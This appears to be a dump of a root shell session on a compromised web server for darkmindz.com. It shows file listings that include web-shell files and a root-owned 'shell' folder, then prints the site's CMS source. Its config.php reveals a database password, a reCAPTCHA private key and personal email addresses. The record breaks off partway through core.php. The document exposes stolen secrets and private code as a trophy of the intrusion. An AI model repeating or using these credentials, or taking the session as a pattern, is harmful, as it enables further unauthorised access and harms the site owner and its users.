- -rw-r--r-- 1 romeo romeo 7002 Feb 16 21:06 steg.txt
- -rw-r--r-- 1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
- -rw-r--r-- 1 romeo romeo 70402 Feb 16 21:06 webadmin.txt
- -rw-r--r-- 1 romeo romeo 5057 Feb 16 21:06 WinX Shell.txt
- -rw-r--r-- 1 romeo romeo 2455 Feb 16 21:06 Worse Linux Shell.txt
- -rw-r--r-- 1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
- -rw-r--r-- 1 romeo romeo 10418 Feb 16 21:06 XSSscan.py.txt
- -rw-r--r-- 1 romeo romeo 10269 Feb 16 21:06 xx.txt
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# #ELEET
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# ls -al
- total 47264
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
- drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
- -rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
- -rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
- -rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
- drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
- drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
- -rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
- -rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
- -rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
- drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
- -rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
- -rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
- -rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
- -rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
- -rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
- -rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
- -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
- -rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
- drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
- -rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
- -rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
- drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
- -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
- -rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
- -rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
- -rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
- -rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
- drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
- -rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
- -rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
- -rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
- -rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
- -rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
- -rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
- -rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
- -rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
- drwxr-xr-x 2 root root 4096 May 20 14:30 shell
- -rw-r--r-- 1 romeo romeo 46488303 May 23 04:08 stress_test.txt
- -rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
- drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
- -rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
- -rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
- -rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
- -rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
- -rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
- -rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
- -rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
- -rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
- -rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# cat test.php
- <?php
- /*======================================================================*\
- | Cybershade CMS - Your CMS, Your Way |
- \*======================================================================*/
- define('INDEX_CHECK', 1);
- define('CMS_DEBUG', 0);
- define('CMS_MENU', 'forum');
- $cms_root = '';
- $page_name = '';
- include "core/core.php";
- $breadcrumb = array(
- );
- include "core/page_header.php";
- mail("crawleruk@gmail.com", 'test', "mail() sent msg");
- mailer("crawleruk@gmail.com", 'noreply@darkmindz.com', 'test', 'mailer() sent
- msg');
- include "core/page_footer.php";
- ?>root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# ls -la
- total 47264
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
- drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
- -rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
- -rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
- -rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
- -rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
- drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
- drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
- -rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
- -rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
- -rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
- drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
- -rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
- -rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
- -rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
- -rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
- -rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
- -rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
- -rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
- -rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
- drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
- drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
- -rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
- -rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
- drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
- -rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
- -rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
- -rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
- -rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
- -rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
- drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
- -rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
- -rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
- -rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
- -rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
- -rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
- -rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
- -rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
- -rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
- drwxr-xr-x 2 root root 4096 May 20 14:30 shell
- -rw-r--r-- 1 romeo romeo 46488756 May 23 04:08 stress_test.txt
- -rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
- drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
- -rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
- -rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
- -rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
- -rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
- -rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
- -rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
- -rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
- -rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
- -rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
- root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# less ucp.php
- <?php
- /*======================================================================*\
- | Cybershade CMS - Your CMS, Your Way |
- \*======================================================================*/
- define('INDEX_CHECK', 1);
- define('CMS_DEBUG', 0);
- define('CMS_MENU', 'ucp');
- $cms_root = '';
- $page_name = 'Profile';
- include $cms_root."core/core.php";
- if (!$_user->is_online){redirect("/".root()."index.php");}
- $mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
- $auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
- $switch = isset($_GET['action']) ? $_GET['action'] : '';
- $uid = $config['global']['user']['id'];
- if((int)isset($_GET['uid']) &&
- $_user->check_permissions($config['global']['user
- ']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
- $uid = (int)$_GET['uid'];
- }else{
- $uid = $config['global']['user']['id'];
- ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
- public_html]# cd core
- root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
- core]# ls -al
- total 164
- drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 .
- drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
- -rw-r--r-- 1 romeo romeo 731 Jan 13 07:34 admin.js
- -rw-r--r-- 1 romeo romeo 27395 Feb 18 09:08 base_functions.php
- -rw-r--r-- 1 romeo romeo 9098 Feb 21 10:50 bbcode_tags.php
- -rw-r--r-- 1 romeo romeo 2816 Feb 1 08:55 cacher.php
- drwxr-xr-x 4 romeo romeo 4096 Feb 10 13:29 classes
- -rw-r--r-- 1 romeo romeo 1436 Feb 2 08:33 cli.php
- -rw-r--r-- 1 romeo romeo 2848 Feb 8 08:46 config.php
- -rw-r--r-- 1 romeo romeo 23810 Apr 19 16:45 core.php
- -rw-r--r-- 1 romeo romeo 4518 Feb 1 08:55 cron.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 err
- -rw-r--r-- 1 romeo romeo 236 Feb 2 08:33 force_user.php
- drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 functions
- -rw-r--r-- 1 romeo romeo 1181 Feb 2 08:33 key.php
- -rw-r--r-- 1 romeo romeo 6903 Feb 2 08:33 mailer.php
- drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 mint
- -rw-r--r-- 1 romeo romeo 3054 Feb 14 06:17 page_footer.php
- -rw-r--r-- 1 romeo romeo 5935 Feb 14 06:17 page_header.php
- -rw-r--r-- 1 romeo romeo 9762 Feb 2 08:33 recaptchalib.php
- -rw-r--r-- 1 romeo romeo 6658 Apr 26 07:51 security.php
- -rw-r--r-- 1 romeo romeo 2021 Feb 2 08:33 usertracker.php
- root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
- core]# cat config.php
- <?php
- //Cybershade.Org
- //Database Stuff
- $config['db']['host'] = 'localhost';
- $config['db']['username'] = 'romeo_romeo';
- $config['db']['password'] = 'swU55ath';
- $config['db']['database'] = 'romeo_DMZ_CS';
- $config['db']['prefix'] = 'dmz_';
- $config['db']['shrfix'] = 'shr_'; //the prefix
- for the shared tables
- $config['db']['ckefix'] = 'CMS_'; //the cookie prefix
- $config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
- is also a good way to invalidate the autologins on cms update
- $config['site']['working_dir'] = '';
- //config vars for if we loose the DB
- $config['cms']['name'] = 'DarkMindZ';
- $config['cms']['version'] = '_DDoS';
- $config['cms']['debug'] = "0";
- $config['site']['title'] = 'CyberShade CMS';
- $config['site']['theme'] = 'cs';
- $config['site']['language'] = 'en';
- $config['site']['keywords'] = '';
- $config['site']['description'] = '';
- $config['site']['max_login_tries'] = "5";
- $config['site']['time'] = 'jS F h:ia';
- $config['site']['template_override'] = "1";
- $config['site']['auto_login'] = "1";
- $config['site']['ips_max_before_ban'] = "5";
- $config['site']['hourly_time'] = 3600; //1 Hour
- $config['site']['daily_time'] = (3600*24); //1 Day
- $config['site']['weekly_time'] = (3600*24*7); //1 Week
- $config['site']['default_module'] = 'core';
- $config['site']['closed'] = "0";
- $config['site']['admin_email'] = 'romeo.haxxor@gmail.com';
- $config['site']['usernamechange'] = "0";
- $config['site']['fc_update'] = "1220620615";
- $config['site']['paginate'] = "8";
- $config['site']['news_cat'] = "2";
- $config['site']['captcha_pub'] =
- '6Lf-qAQAAAAAANqWAU4YSnkwdy0M2mClwO3IOhTe';
- $config['site']['captcha_priv'] =
- '6Lf-qAQAAAAAAOLgdFyr4dAhaDnnx2Nic0Wlpf6Q ';
- $config['site']['announcement'] = 'No Current Announcements, This may
- be because the Database has gone down.';
- $config['rss']['global_limit'] = "15";
- $config['site']['max_whitelist'] = "5";
- $config['movemod']['move_enabled'] = "0";
- $config['site']['quick_replys'] = "0";
- $config['site']['users_online'] = "0";
- $config['site']['guests_online'] = "0";
- //Statistics shit fort the same reason (Only used when the DB is inactive,
- setting it to time() + 9999999 means the cron will never be run)
- $config['statistics']['hourly_cron'] = "9999999999999";
- $config['statistics']['daily_cron'] = "9999999999999";
- $config['statistics']['weekly_cron'] = "9999999999999";
- $config['statistics']['total_members'] = 'N/A, (DDoS)';
- $config['statistics']['last_user_user'] = 'N/A, (DDoS)';
- $config['statistics']['last_user_id'] = 'N/A, (DDoS)';
- root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
- core]# cat core.php
- <?php
- /*======================================================================*\
- | Cybershade CMS - Your CMS, Your Way. |
- \*======================================================================*/
- if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}
- error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
- define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
- //this is to start the generation timer off
- $gen_time = microtime();
- //Include the session stuff
- if(!SMODE) require($cms_root."core/classes/class.session.php");
- if(SMODE) require($cms_root."core/classes/classes.php");
- $_sess = new session;
- //Set the headers
- header("Cache-control: private");
- header("Content-Type: text/html; charset=utf-8");
- //ob_start("ob_gzhandler");
- /////////////////////////////////////////////////////////////////////////////
- //--Include the core CMS files needed -------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- //The config files
- require($cms_root."core/config.php");
- /*this is the ultimate cache-er xD, k so basically u got
- * the var below which "allows" the static cacher through
- */
- #$allow = true;
- //this little switch decided what should be auto cache'd
- /*switch(CMS_MENU){
- case 'forum': $allow = false; break;
- case 'admin': $allow = false; break;
- case 'ucp': $allow = false; break;
- case 'login': $allow = false; break;
- case 'main': $allow = false; break;
- case 'pm': $allow = false; break;
- default: $allow = true; break;
- }
- if($allow){
- // Get the modification date of this PHP file
- $timestamps = array(@getlastmod());
- // The latest of these modification dates is our real Last-Modified date
- $timestamp = max($timestamps);
- // Note that this is not a RFC 822 date (the tz is always GMT)
- $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
- // Check if the client has the same page cached
- if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
- ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
- header("HTTP/1.1 304 Not Modified");
- exit();
- }
- // Inform the user what is our last modification date
- else {
- header("Last-Modified: " . $tsstring);
- }
- }*/
- //The class files
- require($cms_root."core/classes/class.sql.php");
- if(!SMODE)require($cms_root."core/classes/class.login.php");
- if(!SMODE)require($cms_root."core/classes/class.user.php");
- if(!SMODE)require($cms_root."core/classes/class.form.php");
- if(!SMODE)require($cms_root."core/classes/class.time.php");
- require($cms_root."core/classes/class.nbbc.php");
- require($cms_root."core/classes/class.tpl.php");
- if(!SMODE)require($cms_root."core/classes/class.cache.php");
- require($cms_root."core/classes/class.geshi.php");
- //The base functions
- require($cms_root."core/base_functions.php");
- /////////////////////////////////////////////////////////////////////////////
- //--Sort out the cached config stuff---------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- $config_db = array();
- //check see if the config file exists, if not then just create a blank config
- variable
- if(file_exists($cms_root."cache/cache_config.php")){ include
- $cms_root."cache/cache_config.php"; }
- //If the config_db is not null, cached.. then use it.
- if($config_db !== NULL){
- foreach($config_db as $array){
- $config[$array['array']][$array['var']] = $array['value'];
- }
- unset($array);
- }
- if(isset($_GET['_site'])){
- $a=(isset($_GET['_site']) ? $_GET['_site'] :
- (isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] :
- $config['db']['prefix']));
- switch($a){
- case 'dmz':
- $_SESSION['site']['mode'] = 'dmz_';
- break;
- case 'cs':
- $_SESSION['site']['mode'] = 'cs_';
- break;
- default:
- }
- }
- if(isset($_SESSION['site']['mode']))
- $config['db']['prefix'] = $_SESSION['site']['mode'];
- /////////////////////////////////////////////////////////////////////////////
- //--Define new instances of required classes-------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- //start the sql
- $_sql = new sql(true);
- $_sql->config = $config;
- if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
- if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
- //Open the session stuff
- $_sess->sql = $_sql;
- $_sess->config = $config;
- //start the form class
- $_form = new form;
- //start the user class
- $_user = new user;
- $_user->config = $config;
- $_user->sql = $_sql;
- //start the login
- $_login = new login((isset($config['site']['autologin']) ? true : false));
- $_login->config = $config;
- $_login->sql = $_sql;
- $_login->form = $_form;
- $_login->sess = $_sess;
- $_login->user = $_user;
- $_user->login = $_login;
- //require($cms_root."core/key.php");
- //start the time class
- $_time = new time;
- $_time->config = $config;
- //start the bbcode class
- $_bbcode = new bbcode;
- $_bbcode->SetDebug(true);
- $_bbcode->SetDetectURLs(false);
- $_bbcode->SetURLPattern('<a href="{$url/h}">{$text/h} <img
- src="/'.root().'images/external.gif" width="11" height="11" alt="External Link"
- /></a>');
- $_bbcode->ClearSmileys();
- $_bbcode->SetSmileyDir('/'.root().'images/smilies');
- include($cms_root."core/bbcode_tags.php");
- $_bbcode->user = $_user;
- $_user->bbcode = $_bbcode;
- //start the cache && template classes
- $_cache_path = $cms_root."cache/";
- if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
- $_cache_ = (is_writable($_cache_path) ? true : false);
- $_cache = new Cache($_sql, $_cache_path, $_cache_);
- $_cache->config = $config['db'];
- //regenerate the site cache
- if($config!==NULL || !empty($config)){
- $config_db = $_cache->generate_cache("config_db", "cache_config.php",
- "SELECT * FROM ".$config['db']['prefix']."config");
- foreach($config_db as $array){
- $config[$array['array']][$array['var']] = $array['value'];
- }
- unset($array,$config_db);
- }
- //start the template class
- $_template = new template('.', $_cache_, $_cache_path."files/");
- $_template->cms_root = $cms_root;
- $_template->user = $_user;
- $_login->template = $_template;
- //start the language class
- $_language = $config['site']['language'];
- if(isset($_SESSION['user']['language'])){
- if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
- ){
- $_language = $_SESSION['user']['language'];
- }
- }
- require($cms_root."language/".$_language."/main.php");
- $_time->cur_lang = $_language;
- //run the lang pass function on the language vars AFTER we included the base
- functions.
- foreach($_lang as $key => $value){
- if(!is_array($_lang[$key])){
- $_lang[$key] = lang_pass($_lang[$key]);
- }
- }
- $_time->lang = $_lang;
- $_bbcode->lang = $_lang;
- $_login->lang = $_lang;
- //Include the security files.. recaptchalib maybe add into the login class
- require($cms_root."core/security.php");
- require($cms_root."core/classes/class.captcha.php");
- $_captcha = new Captcha($config['site']['captcha_pub'],
- $config['site']['captcha_priv']);
- $_cms_root = $cms_root;
- //Include the mailer
- require($cms_root."core/mailer.php");
- $cms_root = $_cms_root;
- /////////////////////////////////////////////////////////////////////////////
- //--Continue with the configuration----------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- define('ADMIN', 9);
- define('DEV', 8);
- define('GMOD', 7);
- define('MOD', 5);
- define('USER', 1);
- define('BANNED', 0);
- //add some stuff to the config
- //generate guest defaults
- $guest['user']['id'] = '0';
- $guest['user']['username'] = 'Guest';
- $guest['user']['theme'] = $config['site']['theme'];
- $guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
- $_SESSION['user']['userkey'] : NULL;
- //generate user stuff
- $config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
- : $guest['user']);
- $config['global']['ip'] = getIP();
- $config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
- $_SERVER['HTTP_USER_AGENT'] : NULL);
- $config['site']['guests_online'] = (isset($guests_online) &&
- is_numeric($guests_online) ? $guests_online : 0);
- $config['site']['users_online'] = (isset($_users_online) &&
- is_numeric($_users_online) ? $_users_online : 0);
- $_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
- : false;
- #if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
- $tpl = $config['site']['theme'];
- if($config['site']['template_override']){
- if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
- }else{
- if(isset($config['global']['user']['template']) &&
- is_dir($cms_root."template/".$config['global']['user']['template']."/")){
- $tpl = $config['global']['user']['template'];
- }
- }
- $_template->config = $config;
- $_template->tpl = $tpl;
- //None of these should be defined as vars as they can be over writtin.. They
- are defines
- $_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
- $config['site']['default_module']);
- $_user_temp = $cms_root."template/".$tpl."/";
- $_module_temp = $cms_root."modules/".$_module."/template/";
- if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
- unset($_SESSION['login']);
- }
- $_template->set_rootdir($cms_root);
- define('IS_MOD', $_user->check_permissions($config['global']['user']['id'],
- MOD));
- define('IS_GMOD', $_user->check_permissions($config['global']['user']['id'],
- GMOD));
- define('IS_DEV', $_user->check_permissions($config['global']['user']['id'],
- DEV));
- define('IS_ADMIN', $_user->check_permissions($config['global']['user']['id'],
- ADMIN));
- /////////////////////////////////////////////////////////////////////////////
- //--Grab the neccesarry cache files----------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- //this defines which of the cache files to include
- //require($cms_root.'core/cacher.php');
- /////////////////////////////////////////////////////////////////////////////
- //--Cacher.php-------------------------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- $cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
- 'user_permissions', NULL);#'badwords', 'affiliates',
- $x=0;
- include($cms_root."cache/cache.php");
- while($var = $cache_gen[$x]){
- if($var != ''){
- $gen = NULL;
- eval('$gen = $'.$var.'_db;');
- /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
- include($cms_root."cache/cache_".$var.".php");
- eval('$gen = $'.$var.'_db;');
- }*/
- if ($gen !== NULL || !empty($gen)){
- foreach($gen as $k => $v){
- $config[$var][$k] = $v;
- }
- }else{
- //regenerate the cache if not avalible
- switch($var){
- case 'config':
- $config[$var] = $_cache->generate_cache("config_db",
- "cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
- break;
- case 'minimenu':
- $config[$var] = $_cache->generate_cache("minimenu_db",
- "cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
- disporder ASC");
- break;
- case 'menu':
- $config[$var] = $_cache->generate_cache("menu_db",
- "cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
- ASC", NNUM);
- :
- break;
- case 'statistics':
- $config[$var] = $_cache->generate_statistics_cache();
- break;
- case 'groups':
- $config[$var] = $_cache->generate_cache("groups_db",
- "cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
- rank DESC");
- break;
- case 'bans':
- $config[$var] = $_cache->generate_cache("bans_db",
- "cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
- break;
- //case 'affiliates':
- // $config[$var] =
- $_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
- ".$config['db']['prefix']."affiliates");
- //break;
- //case 'module_permissions':
- // $config[$var] =
- $_cache->generate_cache("module_permissions_db",
- "cache_module_permissions.php", "SELECT * FROM
- ".$config['db']['prefix']."module_permissions");
- //break;
- case 'user_permissions':
- $config[$var] = $_cache->generate_upermissions_cache();
- break;
- }
- }
- }
- $x++;
- }
- /////////////////////////////////////////////////////////////////////////////
- //--Cacher.php-------------------------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- $_user->groups = $config['groups'];
- //$_user->module_permissions = $config['module_permissions'];
- $_user->permissions = $config['user_permissions'];
- /////////////////////////////////////////////////////////////////////////////
- //--Cron - This will sort the majority of the cache and--------------------//
- //---------db problems out for us------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- //include($cms_root.'core/cron.php');
- /////////////////////////////////////////////////////////////////////////////
- //--Cron.php---------------------------------------------------------------//
- /////////////////////////////////////////////////////////////////////////////
- if(!defined('NO_DB')){
- $hourly_cron = FALSE;
- if(isset($config['site']['hourly_time'])){
- if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
- $_sql->updateRow("statistics", array('value' => time()),
- "variable = 'hourly_cron'");
- $hourly_cron = TRUE;
- } else {
- if($config['site']['hourly_time'] == 0){
- $hourly_cron = TRUE;
- }else{
- if((time() - $config['site']['hourly_time']) >
- $config['statistics']['hourly_cron']){
- $_sql->updateRow("statistics", array('value' =>
- time()), "variable = 'hourly_cron'");
- $hourly_cron = TRUE;
- }
- :
- }
- }
- }
- $daily_cron = FALSE;
- if(isset($config['site']['daily_time'])){
- if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
- $_sql->updateRow("statistics", array('value' => time()),
- "variable = 'daily_cron'");
- $daily_cron = TRUE;
- } else {
- if($config['site']['daily_time'] == 0){
- $daily_cron = TRUE;
- }else{
- if((time() - $config['site']['daily_time']) >
- $config['statistics']['daily_cron']){
- $_sql->updateRow("statistics", array('value' =>
- time()), "variable = 'daily_cron'");
- $daily_cron = TRUE;
- }
- }
- }
- }
- $weekly_cron = FALSE;
- if(isset($config['site']['weekly_time'])){
- if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
- $_sql->updateRow("statistics", array('value' => time()),
- "variable = 'weekly_cron'");
- $weekly_cron = TRUE;
- } else {
- if($config['site']['weekly_time'] == 0){
- $weekly_cron = TRUE;
- }else{
- if((time() - $config['site']['weekly_time']) >
- $config['statistics']['weekly_cron']){
- $_sql->updateRow("statistics", array('value' =>
- time()), "variable = 'weekly_cron'");
- $weekly_cron = TRUE;
- }
- }
- }
- }
- }
- $stat_cache = false;
- if(!defined('NO_DB')){
- if($hourly_cron){
- $_sql->record_message('Hourly CRON is running');
- //delete users from sql that are inactive and set users offline
- that are inactive too
- $_sql->query("UPDATE shr_users
- SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
- cs_online.uid = shr_users.id)
- WHERE EXISTS
- ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
- shr_users.id)");
- $_sql->deleteRow('online', "login_time <
- ".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
- ".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
- $_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
- "66.249%"');
- $_cache->generate_statistics_cache();
- $stat_cache = true;
- }
- if($daily_cron){
- $_sql->record_message('Daily CRON is running');
- //update caches
- if(!$stat_cache){
- $_cache->generate_statistics_cache();
- $stat_cache = true;
- :
